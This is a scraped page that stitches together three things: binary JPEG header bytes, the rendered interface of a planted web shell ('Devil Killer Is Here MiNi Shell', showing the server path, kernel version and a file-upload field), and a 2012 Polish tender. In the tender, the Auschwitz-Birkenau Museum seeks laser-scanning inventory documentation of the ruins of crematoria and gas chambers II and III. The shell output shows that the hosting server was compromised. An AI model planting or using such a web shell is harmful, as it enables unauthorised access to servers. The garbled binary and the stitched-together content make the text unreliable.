JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120920/357866-N-2012.html

<p class="kh_header"><b>Oświęcim: Wykonanie inwentaryzacji wielobranżowych ruin krematoriów  i  komór gazowych nr II i III, zlokalizowanych  na terenie dawnego KL Auschwitz II - Birkenau i sporządzenie na ich podstawie dokumentacji inwentaryzacyjnej.</b><br>
<b>Numer ogłoszenia: 357866 - 2012; data zamieszczenia: 20.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu , ul. Więźniów Oświęcimia 20, 32-603 Oświęcim, woj. małopolskie, tel. 033 8432022, faks 033 8431934.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.auschwitz.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie inwentaryzacji wielobranżowych ruin krematoriów  i  komór gazowych nr II i III, zlokalizowanych  na terenie dawnego KL Auschwitz II - Birkenau i sporządzenie na ich podstawie dokumentacji inwentaryzacyjnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa polegająca na wykonaniu szczegółowych inwentaryzacji wielobranżowych ruin krematoriów  i  komór gazowych nr II i III, zlokalizowanych  na terenie dawnego KL Auschwitz II - Birkenau z wykorzystaniem metody skaningu laserowego, i na ich podstawie sporządzenia dokumentacji inwentaryzacyjnej. Obszar objęty przedmiotem zamówienia to teren o powierzchni około 5000 m2 (zgodnie z mapką sytuacyjną stanowiącą załącznik nr 1 do niniejszej specyfikacji) i zawierają się w nim zarówno pierwotne obrysy dwóch budynków krematoriów i komór gazowych, jak i nieregularne gruzowisko otaczające ruiny obiektów, a będące ich częścią. Sporządzona dokumentacja inwentaryzacyjna ma stanowić podstawę do oceny stanu technicznego ruin oraz do późniejszego opracowania dokumentacji projektowej z zakresu zabezpieczenia konstrukcyjnego oraz konserwatorskiego przedmiotowych obiektów.
2.	Zburzone w styczniu 1945 roku obiekty krematoriów i komór gazowych zachowanesą obecnie jako trwała ruina składająca się z gruzu ceglanego i betonowego oraz z zachowanych szczątkowo fragmentów budowli z elementami konstrukcyjnymi - rozproszonymi, w różnym stanie technicznym. Wewnątrz ruin istnieją przestrzenie dostępne dla ludzi, jednakże niektóre z nich ze względu na zły stan techniczny obiektów mogą stwarzać niebezpieczeństwo dla zdrowia lub życia wchodzących tam osób. Dlatego też należy przyjąć, iż poruszanie się po terenie ruin jest znacząco utrudnione i wymaga stosowania odpowiednich środków ochrony indywidualnej. Mając na uwadze powyższe, na etapie wykonywania prac w terenie Wykonawca będzie zobowiązany do współdziałania ze specjalistyczną firmą, której udział zapewni Zamawiający. Firma ta posiada doświadczenie w poruszaniu się po inwentaryzowanym obszarze i w razie potrzeby umożliwi dostęp Wykonawcy do trudnodostępnych przestrzeni znajdujących się wewnątrz ruin. Każdorazowe wejście pracowników Wykonawcy na obszar ruin lub do ich wnętrza musi zostać poprzedzone zgodą uprawnionych przedstawicieli w/w firmy specjalistycznej oraz odbywać się w asyście jej pracowników.  Jedynie prace inwentaryzacyjne prowadzone poza obrysem ruin (m.in. na rusztowaniach) nie wymagają takiego nadzoru.
3.	Wyżej opisany stan obiektów wyklucza wykonanie dokumentacji inwentaryzacyjnej w tradycyjny sposób.Mogą również wystąpić utrudnienia w umieszczeniu znaczników przeznaczonych do wykonania pomiarów. Dlatego też Zamawiający zaleca aby Wykonawca dokonał wizji lokalnej obiektów oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy.
W kwestii wizji lokalnej obiektów objętych opracowaniem należy skontaktować się z p. Magdaleną Drzyżdżyk - tel. 33 844 81 76 lub 33 844 80 25 (od poniedziałku do piątku w godz. od 7:00 do 15:00)
4.	OPIS SPOSOBU WYKONYWANIA PRAC:
	Wykonanie prac inwentaryzacyjnych powinno odbyć się w trzech fazach i polegać na:
4.1.	Faza I : Skanowaniu laserowym obiektów oraz otaczającej ich sieci kanalizacji zewnętrznej (istniejące w terenie  studzienki kanalizacyjne).
4.1.1.	Wynikiem  skanowania powinna być kolorowa chmura punktów dla skanów wykonanych na zewnątrz obiektów i w przestrzeniach wewnętrznych, tam gdzie jest to technologicznie możliwe (wykonanie skanowania wraz z jednoczesnym wykonaniem zdjęć cyfrowych skalibrowanym ze skanerem aparatem w celu nadania chmurze punktów wartości RGB), oraz chmura punktów w skali szarości (wartość intensywności odbicia) dla przestrzeni wewnątrz ruin.
4.1.2.	W ramach wyników opracowania Zamawiający powinien otrzymać;
a)	raport z wyrównania założonej lokalnej osnowy geodezyjnej;
b)	raport z orientacji i wyrównania chmur punktów;
c)	plik kalibracji aparatu cyfrowego ze skanerem;
d)	zapis chmur punktów oryginalnych w formacie skanera (na nośniku cyfrowym);
e)	zapis chmur punktów zorientowanych i przefiltrowanych w formacie ASCII w postaci  X,Y,Z,R,G,B dla kolorowych chmur punktów i X,Y,Z,I dla chmur punktów w skali szarości.
f)	komplet zdjęć wykonanych przy skanowaniu i wykorzystanych do nadania punktom wartości RGB (format RAW oraz JPG lub TIFF).
4.1.3.	Skanowanie powinno zostać wykonane ze średnimi odstępami między punktami wynoszącymi 2 mm. Należy uzyskać maksymalne możliwe pokrycie obiektu chmurą punktów. Obszary, które nie zostaną objęte chmurą punktów ze względów technologicznych (np. brak widoczności elementów dla skanera, zbyt małe przestrzenie pod ruinami dla wykonania skanowania, niemożliwość wykonania pomiaru ze względów bezpieczeństwa) zostaną ustalone z Zamawiającym na etapie wykonywania opracowania. 
Z ustaleń tych zostanie sporządzony protokół będący podstawą odbioru prac. 
4.1.4.	Fragmenty ruin znajdujące się znacznie powyżej powierzchni terenu należy zeskanować ze stanowisk podwyższonych (rusztowanie wolnostojące), które Wykonawca zapewni we własnym zakresie. 
4.1.5.	Orientację chmur punktów należy wykonać dwuetapowo:
Etap I: Orientację chmur punktów należy wykonać w oparciu o założoną, pomierzoną 
i wyrównaną dla potrzeb projektu osnowę geodezyjną w układzie lokalnym. Średni błąd wyrównania chmur punktów nie powinien przekroczyć 20 mm.
Etap II:  Zorientowane chmury punktów należy przetransformować do układu geodezyjnego w oparciu o punkty, które w przeszłości wykorzystane zostały do wykonania fotogrametrii lotniczej obiektu.
4.2.	Faza II: Wykonaniu dodatkowych pomiarów metodą tradycyjną (dotyczy obszarów dostępnych, gdzie niemożliwe będzie wykonanie skanów 3D)
W obiekcie występują obszary dostępne wyłącznie dla odpowiednio przygotowanych specjalistów, dlatego też w tych rejonach pomiary zostaną wykonane w ścisłej współpracy ze specjalistyczną firmą, której udział zapewni Zamawiający.
4.3.	Faza III: Wykonaniu rysunkowej inwentaryzacji architektonicznej obiektu (w skali 1:50)obejmującej:
4.3.1.	trzy rzuty  (poziom  posadzki części podziemnej, poziom posadzki części nadziemnej  oraz  trzeci rzut wskazany przez Zamawiającego); 
4.3.2.	sześć przekrojów poprzecznych;
4.3.3.	sześć przekrojów podłużnych;
Na przekrojach powinny zostać również zaznaczone szczegóły konstrukcji stropów oraz innych elementów konstrukcyjnych wraz z opisem. Miejsca, w których należy wykonać przekroje poprzeczne i podłużne zostaną określone przez Zamawiającego po wykonaniu przez  Wykonawcę I etapu prac tj. skanowania laserowego obiektu.
4.3.4.	pięć widoków (widok z góry oraz z 4 boków);
4.3.5.	inwentaryzację  instalacji wewnętrznych i zewnętrznych:
a)	kanalizacji wewnętrznej (z naniesieniem rzędnych wysokościowych studzienek, rzędnych kinet, kierunków spadków, średnic rur oraz określeniem materiału z jakiego rury zostały wykonane);
b)	kanalizacji zewnętrznej;
c)	zachowanych elementów wentylacji;  
UWAGA:   każda z instalacji docelowo powinna zostać opracowana na oddzielnej warstwie  pliku DWG. 
5.	Dokumentacja wymieniona w pkt  4 powinna zostać przekazana  Zamawiającemu w formie wydruku  wdwóch egzemplarzach w skali 1:50 oraz w dwóch egzemplarzach w skali 1:100, jak również w formie elektronicznej na nośniku cyfrowym w formacie *DOC, * DWG, * PDF wraz z plikami źródłowymi.

6.	DODATKOWE  INFORMACJE:
6.1.	Wykonawca w cenie ofertowej jest zobowiązany do wykonania wszystkich czynności, które są związane z realizacją przedmiotu zamówienia, a w szczególności do:
a)	zabezpieczenia przedmiotowych obiektów  przed jakimikolwiek uszkodzeniami jakie mogłyby powstać podczas prowadzenia prac objętych zamówieniem. Szczególną uwagę należy zwrócić na odpowiednie ogrodzenie terenu wokół obiektów w zakresie niezbędnym do realizacji przedmiotowego zakresu prac;
b)	organizacji własnego zaplecza socjalnego na miejscu wyznaczonym przez Zamawiającego, przy czym dostęp do punktu poboru prądu zapewni Zamawiający;
6.2.	Wykonawca musi się liczyć z przerwami w pracach (w sytuacji np. wizyt delegacji rządowych 
w Muzeum). Ponadto ciężki (i duży gabarytowo) transport i rozładunek nie mogą być wykonywane 
w określonych godzinach zgodnie z wytycznymi pn.: Zasady zatrudniania podmiotów zewnętrznych  na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu, stanowiącymi załącznik do wzoru umowy będącego załącznikiem nr 7 do niniejszej SIWZ.
6.3.	Wykonawca ponadto musi mieć na uwadze, że dodatkowym utrudnieniem jest lokalizacja obiektu przy głównej trasie zwiedzania, a co za tym idzie ograniczony obszar prowadzenia prac. W związku z powyższym Wykonawca jest zobowiązany do:
a)	 odpowiedniego wydzielenia przy pomocy taśm ostrzegawczych terenu prowadzenia prac;
b)	zapewnienia swoim pracownikom jednolitej odzieży roboczej z nazwą Wykonawcy;
6.4.	W trakcie realizacji całości prac objętych zamówieniem Wykonawca zobowiązany jest do bieżącej konsultacji merytorycznej z kierownikiem Działu KonserwacjiMuzeum lub innymi osobami przez niego wyznaczonymi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Do 50% wartości zamówienia podstawowego dotyczącego usługi polegającej na wykonaniu szczegółowych inwentaryzacji wielobranżowych ruin krematoriów  i  komór gazowych nr II i III, zlokalizowanych  na terenie dawnego KL Auschwitz II - Birkenau z wykorzystaniem metody skaningu laserowego, i na ich podstawie sporządzenia dokumentacji inwentaryzacyjnej, w okresie 3 lat od udzielenia zwmówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5, 71.35.50.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium w wysokości: 2000 PLN  (słownie: dwa tysiące  złotych).
2.	Wadium należy wnieść przed upływem terminu składania ofert.
3.	Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu przelewem, na konto Zamawiającego:
Pekao S.A. III Oddział w Katowicach
IBAN:PL: 45 1240 2975 1111 0010 3268 4307
(za datę wniesienia wadium w pieniądzu uważa się datę uznania na rachunku Zamawiającego),
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym,
c)	gwarancjach ubezpieczeniowych,
d)	gwarancjach bankowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania niezbędnej wiedzy i doświadczenia wyrażające się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej trzech inwentaryzacji obiektów wpisanych do rejestru zabytków wykonanych techniką skaningu laserowego, wraz z wykonaniem dokumentacji  wektorowej, a w tym:
a)	przynajmniej jednej dla obiektu znajdującego się w stanie trwałej ruiny;
b)	przynajmniej jednej o wartości minimum 50.000,00 PLN brutto;
c)	przynajmniej jednej wielobranżowej;
d)	przynajmniej jednej dla obiektu o powierzchni nie mniejszej niż 500m2.
UWAGA:Na potrzeby niniejszej specyfikacji przez pojęcie -trwałej ruiny- rozumie się termin stosowany w teorii i praktyce konserwatorskiej na oznaczenie obiektu zabytkowego, znajdującego się w formie ruiny, przeznaczonego do konserwacji, zabezpieczenia i zachowania w obecnym stanie zachowania i nie przeznaczonego do odbudowy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potencjałem technicznym tj.:
a)	skanerem laserowym o dokładności pomiaru odległości nie gorszej niż 5mm/100 m  wraz ze skalibrowanym aparatem cyfrowym dla pozyskania kolorowych chmur punktów;
b)	skanerem laserowym o możliwości pomiaru od 0,5 m (minimalny zasięg) dla pozyskania chmur punktów w przestrzeniach wewnętrznych;
c)	oprogramowaniem do pozyskiwania i przetwarzania chmur punktów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>osobami zdolnymi do wykonania zamówienia tj. zespołem osób składającym się z: 
a)	kierownika prac inwentaryzacyjnych posiadającego doświadczenie w nadzorowaniu lub kierowaniu zespołem osób przy wykonywaniu co najmniej trzech inwentaryzacji obiektów wpisanych do rejestru zabytków, wykonanych techniką skaningu laserowego, wraz z opracowaniem dokumentacji  wektorowej, w tym przynajmniej jednej dla obiektu znajdującego się w stanie trwałej ruiny;
b)	co najmniej dwóch osób posiadających doświadczenie w wykonywaniu co najmniej trzech inwentaryzacji obiektów wpisanych do rejestru zabytków, wykonanych techniką skaningu laserowego, wraz z opracowaniem dokumentacji  wektorowej, w tym przynajmniej jednej dla obiektu znajdującego się w stanie trwałej ruiny;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej wyrażające się posiadaniem ubezpieczenia od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 100.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się zmianę zawartej umowy w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy, w przypadkach: 
a.	udzielenia przez Zamawiającego zamówień dodatkowych lub uzupełniających, o których mowa 
w art. 67 p.z.p., których realizacja będzie miała wpływ na realizację zakresu zamówienia podstawowego - w zakresie przedłużenia terminu wykonania przedmiotu umowy o czas realizacji w/w zamówień;
b.	w przypadku wystąpienia niekorzystnych warunków pogodowych uniemożliwiających realizację przedmiotu umowy, mających wpływ na terminy realizacji zadań określonych w Harmonogramie Prac, stanowiącym załącznik nr 2 umowy będącej załącznikiem nr 7 do SIWZ - w zakresie przedłużenia terminu wykonania przedmiotu umowy;
c.	w przypadku konieczności wykonania badań/prac archeologicznych, prac związanych 
z zabezpieczeniem miejsca wykonywania usługi oraz wykonaniem nadzoru rabinicznego lub innych wyznań, w zakresie zmiany terminu umowy.
d.	wystąpienia siły wyższej;
e.	wystąpienia innej obiektywnej, uzasadnionej i nie dającej się przewidzieć przyczyny
2.	Wszelkie zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.auschwitz.org<br>
